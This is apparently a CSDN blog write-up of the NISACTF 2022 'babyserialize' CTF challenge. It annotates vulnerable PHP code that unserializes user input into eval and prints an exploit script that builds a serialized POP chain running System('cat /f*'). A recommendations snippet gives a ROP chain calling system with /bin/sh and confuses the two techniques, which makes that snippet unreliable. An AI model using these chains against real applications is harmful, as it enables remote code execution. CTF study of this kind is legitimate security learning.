pop链构造 [NISACTF 2022]babyserialize

于 2024-02-26 20:33:45 发布
阅读量1k 收藏 25
点赞数 17
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/136302654
版权

打开题目

题目源代码如下

<?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

代码审计一下

include "waf.php";
class NISA{                //定义了一个名为 NISA 的类
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){  //检查 $this->fun 是否等于 "show_me_flag",如果是,则调用 hint() 函数
            hint();
        }
    }

    function __call($from,$val){   //当对象的方法不存在时,__call() 方法会被调用,它接受两个参数:$from 表示调用的方法名,$val 是一个数组,包含调用方法时传递的参数
        $this->fun=$val[0];        //将对象的属性 $this->fun 设置为传递给方法的第一个参数的值,即 $val[0]
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";                //使用 echo 语句输出对象的属性 $this->fun 的值,然后返回一个空格字符串。
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);   //调用了一个名为 checkcheck() 的函数,然后执行了 $this->txw4ever 的代码
        @eval($this->txw4ever);
    }

class TianXiWei{
    public $ext;
    public $x; //定义了一个名为 TianXiWei 的类,其中包含两个属性 $ext$x
    public function __wakeup()//这是一个 PHP 魔术方法,当对象被反序列化时会自动调用。
    {
        $this->ext->nisa($this->x);  //调用 $ext 对象的 nisa() 方法,并将当前对象的属性 $x 作为参数传递给 nisa() 方法。
    }
}

class Ilovetxw{
    public $huang;
    public $su;  //定义了一个名为 Ilovetxw 的类,其中包含两个属性 $huang$su

    public function __call($fun1,$arg){   //PHP 魔术方法,当调用不存在的方法时会自动触发。它接受两个参数:调用的方法名 $fun1 和传递给该方法的参数 $arg
        $this->huang->fun=$arg[0]; //将传递给方法的第一个参数($arg[0])赋值给 $this->huang->fun
    }

    public function __toString(){   // PHP 魔术方法,用于将对象转换为字符串时自动调用
        $bb = $this->su;
        return $bb(); //将 $this->su 赋值给变量 $bb,它尝试执行 $bb(),即调用 $bb 所指向的函数或方法
    }
}

class four{
    public $a="TXW4EVER"; //定义了一个公共属性 $a,并赋值为字符串 "TXW4EVER"
    private $fun='abc'; //定义了一个私有属性 $fun,并赋值为字符串 'abc'

    public function __set($name, $value) //魔术方法,用于在尝试设置不可访问属性时自动调用。
    {
        $this->$name=$value;  //将属性 $name 的值设置为 $value,即动态创建了一个属性
        if ($this->fun = "sixsixsix"){  //这个条件语句中使用了赋值操作 =,它会将属性 $this->fun 的值设置为字符串 "sixsixsix",并且 if 条件会始终为真,因为赋值操作的结果是被赋的值本身
            strtolower($this->a);  //在条件语句中执行了 strtolower($this->a),但没有将结果赋给任何变量或属性
        }
    }

if(isset($_GET['ser'])){   //检查是否存在名为 ser 的 GET 参数
    @unserialize($_GET['ser']);  //$_GET['ser'] 的值进行反序列化操作 @unserialize($_GET['ser']),使用了 @ 符号来抑制可能的错误信息输出
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){  //checkcheck函数接收一个参数$data
//  if(preg_match(......)){ //有一个 preg_match 函数,但是正则表达式部分被省略了
//      die(something wrong);   //如果 preg_match 函数匹配成功,即 $data 符合某个模式,那么会执行 die(something wrong); 来终止脚本执行,并输出 "something wrong"
//  }
//}

//function hint(){  //hint函数这里没有设置参数
//    echo ".......";    //输出了一些占位符信息
//    die();   //调用了 die() 终止脚本的执行
//}
?>

解题思路

这里我是一点思路都没有,可能也是平时接触到的这类型题很少,全靠大佬的wp

(1)eval反推到__invoke

这里先看到eval,而eval中的变量可控,肯定是代码执行,而eval又在__invoke魔术方法中

 先找eval、flag这些危险函数和关键字样(这就是链尾),找到eval函数

反推看哪里用到了类似$a()这种的。

(2)__invoke反推到__toString

在Ilovetxw类的toString方法中,返回了return $bb;

(3)__toString反推到__set

(4)从__set反推到__call

这里反推到Ilovetxw中的__call方法,而__call方法又可直接反推回pop链入口函数__wakeup

大佬的exp

<?php
 
class NISA{
    public $fun="show_me_flag";
    public $txw4ever; // 1 shell
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }
 
    function __call($from,$val){
        $this->fun=$val[0];
    }
 
    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}
 
class TianXiWei{
    public $ext; //5 Ilovetxw
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}
 
class Ilovetxw{
    public $huang; //4 four
    public $su; //2 NISA
 
    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }
 
    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}
 
class four{
    public $a="TXW4EVER"; //3 Ilovetxw
    private $fun='sixsixsix'; //fun = "sixsixsix
 
    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}
 
 
$n = new NISA();
$n->txw4ever = 'System("cat /f*");';
$n->fun = "666";
$i = new Ilovetxw();
$i->su = $n;
$f = new four();
$f->a = $i;
$i = new Ilovetxw();
$i->huang = $f;
$t = new TianXiWei();
$t->ext = $i;
echo urlencode(serialize($t));

生成payload

得到flag

知识点:

_wakeup()魔术方法

当使用 unserialize() 反序列化一个对象成功后,会自动调用该对象的 __wakup() 魔术方法

_call()魔术方法

当对象的方法不存在时,__call() 方法会被调用

也就是无法访问此方法(未定义),此方法被__call()重载,并显示方法名和参数;

_toString()魔术方法

使用 echo 语句输出一个对象时,会自动检查一个对象有没有定义 _toString() 方法,如果定义了,就会输出 __toString() 方法的返回值,如果没有定义,那么会直接抛出一个异常,表明该对象不能直接转换为字符串

也就是说,如果要将一个对象转换为字符串,必须定义 __toString() 魔术方法

_invoke()魔术方法

当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。

具体使用方法见:PHP 魔术方法 - __invoke() - PHP 魔术方法 - 简单教程,简单编程

_set()魔术方法

用于设置私有属性值,有两个参数,第一个参数为你要为设置值的属性名,第二个参数是要给属性设置的值

具体使用方法见:php 中__set()和__get()的具体用法_php __set-CSDN博客

strtolower()函数

strtolower函数把字符串全部转换为小写。

isset()函数

确定变量值是否存在

参考文章:

[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)-CSDN博客

关于[NISACTF 2022]babyserialize详解_web_babyserialize-CSDN博客

访白鹿
关注
  • 17
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[NISACTF 2022]babyserializepop构造与脚本编写详细教学)
Welcome To Myon'Blog !
07-06 1509
一、理清pop并进行标注 二、如何编写相关脚本 三、过滤与绕过 1、waf的绕过 2、preg_match的绕过
[NISACTF 2022]babyserialize
m0_61155226的博客
05-31 338
(1)eval反推到__invoke这里先看到eval,而eval中的变量可控,所以肯定是代码执行,而eval又在__invoke魔术方法中。__invoke魔术方法是对象被当做函数进行调用的时候所触发这里就反推看哪里用到了类似$a()这种的。(2)__invoke反推到__toString在Ilovetxw类的toString方法中,返回了return $bb;__ToString方法,是对象被当做字符串的时候进行自动调用(3)__toString反推到__set。
关于[NISACTF 2022]babyserialize详解
weixin_57222016的博客
05-06 2368
前言 先甩出PHP的魔术方法。 __invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法 __construst():具有构造函数的类在创建新对象的时候,回调此方法 __destruct():反序列化的时候,或者对象销毁的时候调用 __wakeup():反序列化的时候调用 __sleep():序列化的时候调用 __toString():把类当成字符串的时候调用,一般在echo处生效 __set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
[NISACTF 2022]上
qq_62046696的博客
07-26 3450
在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
辞郁POP打印工具(2022-01-07)
12-23
辞郁POP工具主要用于:打印零售软件中商品POP促销单。 本程序使用于:思迅软件、科脉软件、百威软件、泰格软件、嬴通软件等。 安装配置完连接参数后,用默认管理员账号:辞郁,密码:ciyu登录,主界面左上角,双击...
php反序列化pop.html
07-25
php反序列化pop.html
Pop-up Photo Wall 1.6
08-09
Pop-up Photo Wall 1.6
C#实现POP3邮件接收程序
12-22
本文通过运用C#来实现一个基于POP3协议的邮件接收程序来向大家展示C#网络编程的功能强大,同时也向大家介绍一下基于POP3协议的电子邮件接收原理。  首先我向大家介绍邮件接收的基本原理:  一开始便是客户端与...
pop.rar_pop
09-24
thread example in java can be used in applet or window
关于ctf反序列化题的一些见解([MRCTF2020]Ezpop以及[NISACTF 2022]babyserialize
最新发布
whale_waves的博客
12-14 1241
这里对php反序列化做简单了解 在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。 serialize()函数序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变 如果想要将已序列化的字符串变回 PHP 的值,可使用用unserialize() 当在反序列化后不同的变量和引用方法会调出不同的php魔法函数 php魔法函数 __wakeup():在执行unserialize时,会最先调用这个函数 __sleep():在执行serialize
[NISACTF 2022]babyserialize - 反序列化(waf绕过)【*】
oZuoShen123的博客
10-07 972
1、分析条和属性   条:`TianXiWeis(__wakeup)-> Ilovetxw(__call)-> four(__set) -> Ilovetxw(__toString)-> NISA(__invoke)`   属性:`TianXiWeis(ext=$i)-> Ilovetxw(huang=$f)-> four(fun="sixsixsix";a=$i)-> Ilovetxw(su=$n)-> NISA(txw4ever=命令)`
[NISACTF 2022]
snowlyzz的博客
09-09 5960
NISACTF部分WP
NSSCTF web题记录
m0_64815693的博客
11-08 9590
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
NSSCTF web学习
akxnxbshai的博客
09-30 1190
NSSCTF web刷题
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
NISACTF2022公开通道
as you know, nlp is fantasitc!
03-29 2046
NISACTF2022公开通道checkinlevel_up第一层 robots.txt第二层 md5碰撞第三层 sha1碰撞第四层 parse_url解析漏洞第五层create_function()注入bingdundunbabyserializebabyuploadeasyssrfis secret(原题)popchain(原题)middlevel(原题) 题目 checkin urlencode,因为解释器读取出来的才是真正的顺序 ahahahaha=jitanglailo&&%E2%
帮我写一个pop构造
05-05
首先,让我们回顾一下pop的概念:pop是一种利用栈溢出漏洞来实现任意代码执行的攻击手段。它的基本思路是:通过构造一条ROP,将栈中的返回地址覆盖成pop指令的地址,从而将攻击者控制的地址弹出栈顶,进而实现任意代码执行。 下面是一个简单的pop构造示例,假设目标程序存在一个栈溢出漏洞,攻击者想要利用该漏洞实现任意代码执行: ```python # pop构造示例 # pop rdi; ret指令的地址,用于将下一个参数送入rdi寄存器 pop_rdi_ret = 0x4006b3 # system函数的地址,用于调用system函数执行shell命令 system_addr = 0x7ffff7a52390 # /bin/sh字符串的地址,用于作为system函数的参数 bin_sh_addr = 0x7ffff7b97018 # 构造pop pop_chain = p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr) # 将pop_chain写入溢出的缓冲区,覆盖返回地址 payload = b'A' * 32 + pop_chain # 触发栈溢出漏洞,执行pop ``` 在这个示例中,我们构造了一条包含三个指令的pop,分别是pop rdi; ret、system和/bin/sh字符串的地址。通过将pop_chain写入溢出的缓冲区,我们可以覆盖返回地址,从而让程序跳转到pop rdi; ret指令的地址,执行pop rdi指令将/bin/sh字符串的地址送入rdi寄存器,再执行ret指令弹出栈顶,跳转到system函数的地址,最终调用system函数执行shell命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值